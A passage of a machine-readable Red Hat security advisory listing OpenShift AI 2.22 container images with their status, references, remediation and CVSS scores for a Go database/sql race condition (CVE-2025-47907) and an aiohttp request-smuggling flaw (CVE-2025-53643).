"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64"
],
"known_not_affected": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-47907"
},
{
"category": "external",
"summary": "RHBZ#2387083",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2387083"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-47907",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-47907"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-47907",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-47907"
},
{
"category": "external",
"summary": "https://go.dev/cl/693735",
"url": "https://go.dev/cl/693735"
},
{
"category": "external",
"summary": "https://go.dev/issue/74831",
"url": "https://go.dev/issue/74831"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-announce/c/x5MKroML2yM",
"url": "https://groups.google.com/g/golang-announce/c/x5MKroML2yM"
},
{
"category": "external",
"summary": "https://pkg.go.dev/vuln/GO-2025-3849",
"url": "https://pkg.go.dev/vuln/GO-2025-3849"
}
],
"release_date": "2025-08-07T15:25:30.704000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2025-12-04T13:06:08+00:00",
"details": "For Red Hat OpenShift AI 2.22.3 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this errata update:\n\nhttps://docs.redhat.com/en/documentation/red_hat_openshift_ai/",
"product_ids": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2025:22759"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 7.0,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:L/A:L",
"version": "3.1"
},
"products": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "database/sql: Postgres Scan Race Condition"
},
{
"cve": "CVE-2025-53643",
"cwe": {
"id": "CWE-444",
"name": "Inconsistent Interpretation of HTTP Requests (\u0027HTTP Request/Response Smuggling\u0027)"
},
"discovery_date": "2025-07-14T21:00:57.122280+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2380000"
}
],
"notes": [
{
"category": "description",
"text": "A request smuggling flaw was found in the aiohttp python library. If a pure Python version of aiohttp is installed, without the usual C extensions, for example, or if AIOHTTP_NO_EXTENSIONS is enabled, an attacker can execute a request smuggling attack to bypass certain firewalls or proxy protections.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "aiohttp: AIOHTTP HTTP Request/Response Smuggling",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64"
],
"known_not_affected": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64",
